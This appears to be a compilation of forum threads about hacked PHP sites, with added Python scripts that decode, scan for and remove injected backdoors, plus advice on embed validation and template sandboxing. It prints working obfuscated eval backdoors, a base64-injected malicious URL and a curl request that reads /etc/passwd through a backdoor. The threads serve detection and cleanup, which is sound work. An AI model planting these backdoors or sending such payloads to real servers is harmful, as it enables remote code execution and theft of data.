One of my sites was hacked last night and some pornographic content was placed on it.
What I have done:
I have manually removed the adult content from the site using FTP.
My website is up now and working fine. But I am still able to find some code in my plugin and theme files which was not written by me. The code is as below:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>
My queries are:
What does this code stand for; what is it doing?
Is this harmful?
Should I remove this code from my files?
Will this have any effect on my site if removed?
Other code suggestions required:
This sort of code is present in 100+ files. Is there any method to remove the code from all files at once? Or any method to keep the code and just disinfect it? That would save me the time of removing the code manually from so many files.
What does this code stand for; what is it doing?
This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do.
<?php
eval( base64_decode( $_POST['n842e1c'] ) );
An attacker can make a POST request to this file with an encoded payload in the POST parameter n842e1c and execute PHP code.
Example:
curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
Here, ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the Base64-encoded string of echo readfile('/etc/passwd');.
Is this harmful?
Yes
Should I remove this code from my files?
Yes
Will this make any effect on my site if removed?
No
Here are some tips to help you clean the website. Also, follow this official post by WordPress to take the necessary steps.
It's a backdoor, taking a POST parameter named n842e1c and executing it. The instruction is encoded as Base64.
It is.
You should, immediately.
Nothing; remove it ASAP.
Maybe re-install WordPress, or you could quickly develop a script in Python (or something else) to remove this string from your files.
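The first answer shows what the index-built strings resolve to, and this one suggests scripting the cleanup. The following Python script is an added example, not code from either answer: it resolves the $sF[...] chains itself, reports which decoder, superglobal and parameter name a copy of the backdoor uses, and removes the block from a file only after a dry-run scan. The sample input is the snippet quoted in the question; the function names and the .bak convention are this example's own choices.

```python
import os
import re

# Constructed sample input: the obfuscated block quoted in the question above,
# reproduced only so the scanner has something to recognise.
SAMPLE = '''<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
if(isset($s22))
{
eval($s21($s22));
}
?>'''

STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')
INDEX_REF = re.compile(r'\$(\w+)\[(\d+)\]')
CASE_CALL = re.compile(r'(strtolower|strtoupper)\(((?:\$\w+\[\d+\]\.?)+)\)')
PARAM_REF = re.compile(r"\}\['([^']+)'\]")
# Whole-block signature: alphabet string, strtolower() name builder, eval of the result.
BACKDOOR_BLOCK = re.compile(
    r'<\?php\s*\$\w+="[^"]*";\s*\$\w+=strtolower\(.*?eval\(\$\w+\(\$\w+\)\);\s*\}\s*\?>', re.S)


def resolve_index_expr(expr, tables):
    """Rebuild the string that a chain such as $sF[4].$sF[5] evaluates to."""
    return "".join(tables[name][int(i)] for name, i in INDEX_REF.findall(expr))


def decode_identifiers(src):
    """Return the names hidden behind strtolower()/strtoupper() index chains, in source order."""
    tables = dict(STRING_ASSIGN.findall(src))
    names = []
    for fn, expr in CASE_CALL.findall(src):
        word = resolve_index_expr(expr, tables)
        names.append(word.lower() if fn == "strtolower" else word.upper())
    return names


def analyze(src):
    """Describe the backdoor in a file, or return None when the signature is absent."""
    if not BACKDOOR_BLOCK.search(src):
        return None
    names = decode_identifiers(src)
    param = PARAM_REF.search(src)
    return {
        "decoder": names[0] if names else None,          # e.g. base64_decode
        "source": names[1] if len(names) > 1 else None,  # e.g. _POST
        "param": param.group(1) if param else None,      # e.g. n842e1c
    }


def strip_backdoor(src):
    """Remove every copy of the block; the legitimate code around it is left untouched."""
    return BACKDOOR_BLOCK.sub("", src)


def scan_tree(root, extensions=(".php",)):
    """Walk a directory and report infected files without modifying anything."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = analyze(fh.read())
                if found:
                    hits[path] = found
    return hits


def clean_file(path):
    """Write a .bak copy first, then remove the block; run only after reviewing scan_tree()."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    cleaned = strip_backdoor(original)
    if cleaned != original:
        with open(path + ".bak", "w", encoding="utf-8") as fh:
            fh.write(original)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return cleaned != original


if __name__ == "__main__":
    print(analyze(SAMPLE))
    # {'decoder': 'base64_decode', 'source': '_POST', 'param': 'n842e1c'}
```

Run scan_tree() over the web root first and read the report; the signature only matches the variant quoted here, so a different obfuscation scheme needs its own pattern, and files flagged in the report should be eyeballed before clean_file() touches them. Keep the .bak copies off the web root once the cleanup is confirmed, and rotate every password and token the site holds, since the attacker could read them while the backdoor was live.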
PHP eval is dangerous.
It basically executes the code within its function. So you must remove it if you are not sure of its use in your website.
The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
Source
You cannot disable it directly, so the only choice is to remove the code from all the files.
Try installing these free plugins on your Website.
Sucuri WordPress Auditing and Theme Authenticity Checker (TAC).
Follow the URLs below to get some help.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
http://www.wpbeginner.com/beginners-guide/beginners-step-step-guide-fixing-hacked-wordpress-site/
A friend of mine asked me to make some changes to his website. When looking at the code I found that every PHP file had this single line of code. So I had to decode the string and replace the file with the result. From there I was able to make the proper adjustments to the site.
<?php eval("?>".base64_decode("PD9waHANCglpbmNsdWRlX29uY2UoJ2Z1bmN0aW9ucy5waHAnKTsNCj8+DQo8IURPQ1RZUEUgaHRtbCBQdWJsaWMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0a......=")); ?>
My question is, why would someone do such a thing? Doesn't this add an extra process to every page?
He just thought that this might protect the code from being stolen, but that's wrong of course.
This is the code:
<?php
$mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
$tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
$lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb#:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'#)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]#[7hXC"S
$tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
$kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U#ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O#*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK#_(8ocvKR=II#F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7#%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*#,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^#L9XHqE?2Vyn0mO#UT#Ez';$mynbq='5XNBz#';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD#t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
##_W}8|bSK^C#$J..a5:]s(
$sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt#GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|#o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O#f_IU^5WTG"tS!/
$wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y#pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh#DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
$kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a#j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD##5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X#w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R#%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
$ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3#?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
$flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
$ryy='q0ht#';##rt3I]{hp6$AWo7yb#|xKCPo?VBY$[{[
$lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
/*[SXl3i[#y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';
?>
I've tried figuring out what it means or what it's trying to do, but I think it might be a bit over my head. Can anyone tell me if this is in fact a malicious backdoor script that found its way onto the server?
UPDATE
I found this code in sites/default/files in a Drupal installation. Luckily you can't execute PHP from that folder, but it means a "normal" or "anonymous" user tried to upload this.
It is malicious all right; however, it dynamically evaluates code supplied by the browser, so we cannot determine what has been executed against it. It is possible it was used in a file include attack, so being able to execute PHP in its stored location matters little.
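The script above hides every function name behind PHP's string XOR operator ('abc' ^ 'xyz' XORs byte by byte and truncates to the shorter operand), with the junk comments and bare string literals acting as padding. The following Python is an added example, not part of the thread: it reproduces that operator and applies it to operand pairs copied from the posted script (three via a regex over a short excerpt, three copied by hand because their left operand is built by concatenation first, and '.' binds tighter than '^' in PHP). Resolving them shows the script silencing errors with ini_set/error_reporting, reading $_COOKIE['ksnkhe'], comparing its md5 against a 32-character constant built the same way, and handing the remaining XOR-built text to create_function. The variable names are the script's own; the dictionary layout and function names are this example's.

```python
import re


def php_string_xor(left, right):
    """PHP's '^' on two strings: XOR byte by byte, truncated to the shorter operand."""
    return "".join(chr(ord(a) ^ ord(b)) for a, b in zip(left, right))


# A short excerpt copied from the posted script (three of its assignments).
EXCERPT = ("$mign='*]`Dy6b'^'G';"
           "$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';"
           "$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';")

XOR_ASSIGN = re.compile(r"\$(\w+)='([^']*)'\^'([^']*)'")


def find_xor_pairs(src):
    """Resolve every $name='...'^'...' assignment in a script to its plain-text value."""
    return {name: php_string_xor(a, b) for name, a, b in XOR_ASSIGN.findall(src)}


# Operand pairs copied by hand from the rest of the script. For koqp and kgxnh the
# left operand is a concatenation the script builds before the XOR is applied.
HAND_COPIED = {
    "koqp": ("o/-dba*MsPYJCY", "0lb+)(o"),           # ${'o/-dba*MsPYJCY'^$pef}, $pef='0lb+)(o'
    "nrohc": ("(_", "Lj$5KKm"),
    "kgxnh": ("HFJ01,0=^SG%C%;", "+4/QEIo[+=$Q*JU"),  # $bplv.$ivcppw ^ $fbbqn
}


def reconstruct():
    """Name the calls the script makes once the XOR-built strings are resolved."""
    names = find_xor_pairs(EXCERPT)
    names.update({k: php_string_xor(a, b) for k, (a, b) in HAND_COPIED.items()})
    hash_fn = names["mign"] + names["nrohc"]        # $xepyo = $mign . $nrohc
    cookie = "$" + names["koqp"] + "['ksnkhe']"     # $ctwvbd = $koqp['ksnkhe']
    return {
        # $nmpnj($cqhi, $zswu) with $zswu = 0, then $cqhi($zswu)
        "silence_errors": f"{names['nmpnj']}({names['cqhi']!r}, 0); {names['cqhi']}(0);",
        "input_source": cookie,
        # if ($tnzm == $xepyo($ctwvbd)); $tnzm is a 32-character XOR-built constant
        "gate": f"{hash_fn}({cookie}) == <32-byte constant>",
        # $dwl = $kgxnh($qpm, $whql); the body $whql is itself XOR-built
        "executor": names["kgxnh"],
    }


if __name__ == "__main__":
    for key, value in reconstruct().items():
        print(f"{key}: {value}")
```

The gate is the useful detection detail: a request carrying a cookie named ksnkhe to a file under sites/default/files is a clean indicator for web-server log review, and the create_function call is what an up-to-date PHP (8.0 removed it) would have refused anyway. The payload body is not decoded here because it is assembled from the long $fduger/$wuxhwd strings in the same way; the same helper applied to those literals recovers it for offline review.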
At my company, we have a problem with most eCommerce software like osCommerce and OpenCart and some content management sites like WordPress or Joomla!.
This is the code we find in pretty much every footer.php, header.php and index.php file in some of the sites my company is running on a third-party hosting company.
PHP injection code sample
Giving it some thought... isn't it possible to have a regex for detecting this particular piece of code? It's exactly the same pattern found on some pages, without variation, so I think a pattern-matching algorithm or a search-and-replace method would be the best candidate to help us (apart from a good security audit, which we're actually running with one of Spain's top auditing companies).
Can you give me a hint on what method we could use for such a detection and removal pattern?
I wouldn't use an automated process on something so critical. I would want a human to check each file specifically as part of the removal.
Just search for that base64 string? aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==
It decodes to: hxxp://browserglobalstat.com/statD/stat.php (don't go there!!) so it's probably always the same string.
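Searching for one known base64 string finds one known variant; decoding every long base64 literal in the tree and showing a reviewer what it hides catches the next one too. The following Python is an added example, not code from the thread: it finds base64-looking runs in a file's contents, decodes those that are valid and printable, labels each as a remote URL, PHP code or other, and flags the marker string quoted in the answer above. The sample footer is constructed around that marker plus a second, locally built literal; the defanging (hxxp) follows the answer's own convention. It reports only; removal stays a manual step, as the previous answer advises.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to be worth decoding (short runs are mostly identifiers).
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Known-bad literal quoted in the thread above; extend with anything else you confirm.
KNOWN_MARKERS = {
    "aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==",
}

# Constructed sample file: a footer carrying the marker above plus a second
# literal built here at import time; neither line is real site code.
SAMPLE_FOOTER = (
    "<?php\n"
    "echo '<script src=\"' . base64_decode('aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==') . '\"></script>';\n"
    "eval(base64_decode('" + base64.b64encode(b"echo 'constructed sample';").decode() + "'));\n"
    "?>\n"
)


def defang(text):
    """Make URLs in a report non-clickable, as the answer above does with hxxp."""
    return text.replace("http://", "hxxp://").replace("https://", "hxxps://")


def try_decode(literal):
    """Decode a literal to text, or None if it is not valid base64 or not printable."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def classify(text):
    """Rough label so a reviewer can sort hits: remote URL, PHP code, or something else."""
    stripped = text.strip()
    if stripped.startswith(("http://", "https://")):
        return "url"
    if re.search(r"<\?php|\beval\s*\(|\becho\b|\$_(GET|POST|COOKIE|REQUEST)", stripped):
        return "php"
    return "other"


def scan_source(src):
    """Return one finding per decodable literal in a file's contents; nothing is modified."""
    findings = []
    for m in B64_LITERAL.finditer(src):
        decoded = try_decode(m.group(0))
        if decoded is None:
            continue
        findings.append({
            "literal": m.group(0),
            "decoded": defang(decoded),
            "kind": classify(decoded),
            "known_marker": m.group(0) in KNOWN_MARKERS,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_source(SAMPLE_FOOTER):
        print(finding["kind"], finding["known_marker"], finding["decoded"])
```

Feed scan_source() the contents of each footer.php, header.php and index.php (an os.walk over the web root does), and review the "url" and "php" findings first; legitimate base64 in a CMS is mostly inline images and serialized data, which land in "other". Once a decoded URL or payload is confirmed malicious, add its literal to KNOWN_MARKERS so later scans flag it by name, and treat the remote host as an indicator to block and to search for in proxy and DNS logs.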
I'm allowing users to embed content from YouTube, Vimeo, Scribd, Flickr, SlideShare, etc., and therefore I'm allowing them to paste the embed code in a textbox.
I'm having a hard time figuring out how to:
(a) validate that it's indeed a correctly formed embed code and (b) whether it's not malicious code that the user is trying to get my system to display.
This is a PHP website.
I've used HTMLPurifier in the past. There are some others, but this one worked the best for me. You can whitelist all allowed code constructs and make the HTML code standards compliant. It's a good first line of defense against XSS attacks.
The library is quite big and can slow down your code if you don't install it correctly, so read the install docs carefully.
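The whitelisting approach the answer recommends can be made much narrower than a general HTML purifier when the input is only ever an embed snippet: accept exactly one iframe, only the attributes a player needs, only an https src on a known player host and path, and re-emit the tag from the validated parts rather than echoing the user's markup. The following Python is an added example of that check, not code from the answer or from HTMLPurifier; the host/path allowlist is an assumption covering two YouTube hosts and Vimeo's player, and the attribute set, default size and function names are this example's own.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: player host -> required path prefix. Extend it for Scribd,
# Flickr, SlideShare and others after checking each service's embed URL shape.
ALLOWED_EMBED_HOSTS = {
    "www.youtube.com": "/embed/",
    "www.youtube-nocookie.com": "/embed/",
    "player.vimeo.com": "/video/",
}
ALLOWED_ATTRS = {"src", "width", "height", "frameborder", "allowfullscreen", "title", "allow"}


class EmbedParser(HTMLParser):
    """Collect <iframe> attributes and note anything else that appears in the snippet."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.problems = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))  # bare attributes arrive with value None
        else:
            self.problems.append(f"<{tag}> is not allowed")

    def handle_data(self, data):
        if data.strip():
            self.problems.append("text outside the <iframe> is not allowed")


def _dimension(value, default):
    """Accept only plain pixel counts in a sane range; None means 'attribute absent'."""
    if value is None:
        return default
    if value.isdigit() and 1 <= int(value) <= 4000:
        return int(value)
    return None


def validate_embed(markup):
    """Return (True, normalised iframe) for an acceptable snippet, else (False, reason)."""
    parser = EmbedParser()
    parser.feed(markup)
    parser.close()
    if parser.problems:
        return False, parser.problems[0]
    if len(parser.iframes) != 1:
        return False, "expected exactly one <iframe>"
    attrs = parser.iframes[0]
    for name in attrs:
        if name not in ALLOWED_ATTRS:  # rejects onload=, srcdoc=, style=, ...
            return False, f"attribute {name} is not allowed"
    src = attrs.get("src") or ""
    url = urlsplit(src)
    if url.scheme != "https":  # also rejects javascript: and scheme-relative URLs
        return False, "src must be an https URL"
    prefix = ALLOWED_EMBED_HOSTS.get(url.hostname)
    if prefix is None or not url.path.startswith(prefix):
        return False, f"{url.hostname or 'missing host'} is not an allowlisted player"
    width = _dimension(attrs.get("width"), 560)
    height = _dimension(attrs.get("height"), 315)
    if width is None or height is None:
        return False, "width/height must be plain pixel counts"
    # Re-emit from validated parts rather than echoing the user's markup back.
    clean = (f'<iframe src="{escape(src, quote=True)}" width="{width}" height="{height}" '
             'frameborder="0" allowfullscreen></iframe>')
    return True, clean


if __name__ == "__main__":
    print(validate_embed('<iframe width="560" height="315" '
                         'src="https://www.youtube.com/embed/EXAMPLEID" allowfullscreen></iframe>'))
```

Because the output is rebuilt from three validated values, nothing the user typed reaches the page verbatim, which is what makes the check easy to reason about. Matching on url.hostname rather than a substring is deliberate: "www.youtube.com.example.net" and "https://www.youtube.com@example.net/" both fail the lookup. A stored embed should still be rendered inside a page that sends a Content-Security-Policy with a frame-src list mirroring ALLOWED_EMBED_HOSTS, so that a bug in the validator does not become an exploitable one.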
We will be implementing a system where we ask the user to specify the direct URL and we go and subsequently fetch appropriate data from that page.
We have a CMS editor where PHP is allowed to be used inside it; however, we need to restrict access to some commands such as file_get_contents, file(), and global.
Can someone help me with a boolean response regex for that? The text from the template is stored in a string.
I know, probably not an ideal method for this but it's all I can come up with for now :)
What you want to do is pretty much impossible. It is really hard to protect yourself against attacks if you allow people to execute code on your machine.
Here is the try I had on it: Sandbox. Source code.
What it does is basically maintain a large list of blacklisted functions for filesystem access, shell access, and so on (I allowed some functions for reading the filesystem, like show_source, that should not be allowed if you want to use it for something real).
It also tries to protect from more hidden attacks like $func = 'unlink'; $func(__FILE__); by turning it into $func = 'unlink'; ${'___xyz'.!$___xyz=Sandbox::checkVarFunction($func)}(__FILE__) and so on.
PS: Still, you probably don't want to allow people to run PHP code on your site. The risk is just by far too big. Instead, I would allow people to use a templating language inside the editor. A good candidate would be Twig, because it has a built-in sandbox which allows you to restrict usage to certain tags, functions, ...
It's going to be very hard to protect yourself perfectly.
As I see it, you have a few options:
Search for predefined strings which are not allowed in your content (like file_get_contents) and display an error message saying that the user cannot save because of this. This will however lead to "hacks" where you'll end up searching for all possible characters, like (), which can be valid in some cases.
Use token_get_all and try to parse the content as PHP. You can then loop through the whole source code, token by token, and see if you find a token you do not accept.
Write your own language or DSL for this. This language should only be capable of doing exactly what you want. Depending on your requirements, this can be the easiest and most maintainable way to go.
You can use preg_match for this. Use:
if (preg_match("#(file_get_contents|file)\(#i", $text)) {
    // a blocked function call was found; refuse to save the template
}
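The preg_match answer blocks two spellings of two names; the token-based option in the previous answer inverts that into an allowlist: every identifier followed by "(" must be a permitted function, and any call whose name is only known at run time is refused outright. The following Python is an added example of that check, not code from either answer and not PHP's token_get_all; it uses a small regex lexer for PHP template text instead. The allowed-function and construct lists are assumptions to be tuned for the site; the three names the question mentions (file_get_contents, file(), global) are handled by not being on the allowlist or by being forbidden outright.

```python
import re

# Functions a template author may call; everything else is rejected. Assumed list.
ALLOWED_FUNCTIONS = {
    "htmlspecialchars", "strtoupper", "strtolower", "ucfirst", "trim", "strlen",
    "count", "implode", "explode", "number_format", "date", "nl2br",
}
# Language constructs that look like identifiers and may legitimately precede "(".
CONSTRUCTS = {
    "if", "elseif", "else", "endif", "foreach", "endforeach", "as", "for", "endfor",
    "while", "endwhile", "echo", "print", "isset", "empty", "true", "false", "null",
    "and", "or", "xor", "php",
}
# Constructs that must never appear, with or without parentheses (the question names
# global; eval/include/require are added here because they need no parentheses either).
FORBIDDEN = {"eval", "include", "include_once", "require", "require_once", "global"}

TOKEN = re.compile(
    r"(?P<ws>\s+)"
    r"|(?P<comment>//[^\n]*|#[^\n]*|/\*.*?\*/)"
    r"|(?P<string>'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\")"
    r"|(?P<var>\$[A-Za-z_]\w*)"
    r"|(?P<ident>[A-Za-z_]\w*)"
    r"|(?P<punct>.)",
    re.S,
)


def tokenize(src):
    """Split PHP template text into (kind, text) pairs, dropping whitespace and comments."""
    return [(m.lastgroup, m.group()) for m in TOKEN.finditer(src)
            if m.lastgroup not in ("ws", "comment")]


def check_template(src):
    """Return a list of problems; an empty list means every call is on the allowlist."""
    tokens = tokenize(src)
    problems = []
    for i, (kind, text) in enumerate(tokens):
        nxt = tokens[i + 1][1] if i + 1 < len(tokens) else None
        if kind == "ident":
            name = text.lower()
            if name in FORBIDDEN:
                problems.append(f"{text} is not permitted")
            elif nxt == "(" and name not in CONSTRUCTS and name not in ALLOWED_FUNCTIONS:
                problems.append(f"call to {text}() is not on the allowlist")
        elif kind == "var" and nxt == "(":
            # $f = 'unlink'; $f(...): the name is decided at run time, so refuse it.
            problems.append(f"variable function call {text}() is not permitted")
        elif kind == "punct" and text == "$":
            problems.append("variable variables (${...} / $$x) are not permitted")
        elif kind == "punct" and text == "`":
            problems.append("backtick operator is not permitted")
    return problems


if __name__ == "__main__":
    print(check_template("<?php echo htmlspecialchars($title); ?>"))   # []
    print(check_template("<?php echo file_get_contents('/some/path'); ?>"))
```

Because comments and whitespace are dropped before the "identifier followed by (" check, a call split as file_get_contents /* */ ( is caught, which the regex misses, and call_user_func('unlink', ...) fails simply because call_user_func is not allowlisted. The lexer is deliberately coarse: method and static calls ($obj->method(), Cls::fn()) are rejected too, since their names are not on the list, and that is the safe default for a template. It remains a syntactic filter over a language with many more ways to reach a function, which is why the earlier answer's advice to switch to a sandboxed template language such as Twig still applies.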